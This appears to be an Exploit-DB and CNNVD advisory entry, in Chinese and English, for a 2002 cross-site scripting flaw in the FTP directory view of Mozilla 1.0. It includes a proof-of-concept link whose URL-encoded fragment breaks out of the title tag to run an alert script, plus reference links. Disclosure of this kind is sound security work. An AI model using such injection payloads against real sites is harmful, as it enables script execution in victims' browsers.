https://www.exploit-db.com/exploits/21682
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200212-275

Mozilla1.0版本FTP查看功能存在跨站脚本攻击(XSS)漏洞。远程攻击者借助ftpURL标题标签注入任意web脚本或HTML。

source: http://www.securityfocus.com/bid/5403/info

A cross-site scripting vulnerability in Mozilla has been reported. When viewing the contents of a FTP site as web content from a ftp:// URL, the directory name is included in the HTML representation. It is not adequately sanitized before this occurs. An attacker may embed javascript as this value between opening and closing "<title>" tags in a FTP URL.

<a href="ftp://[FTPserver]/#%3C%2ftitle%3E%3Cscript%3Ealert(%22exploit%22);%3C%2fscript%3E">Exploit</a>

Example:
<a href="ftp://ftp.mozilla.org/#%3C%2ftitle%3E%3Cscript%3Ealert(%22exploit%22);%3C%2fscript%3E">Exploit</a>

来源:BID
名称:5403
链接:http://www.securityfocus.com/bid/5403
来源:XF
名称:multiple-ftp-view-xss(9757)
链接:http://www.iss.net/security_center/static/9757.php
来源:bugzilla.mozilla.org
链接:http://bugzilla.mozilla.org/show_bug.cgi?id=154030
来源:VULNWATCH
名称:20020806MozillaFTPViewCross-SiteScriptingVulnerability
链接:http://archives.neohapsis.com/archives/vulnwatch/2002-q3/0060.html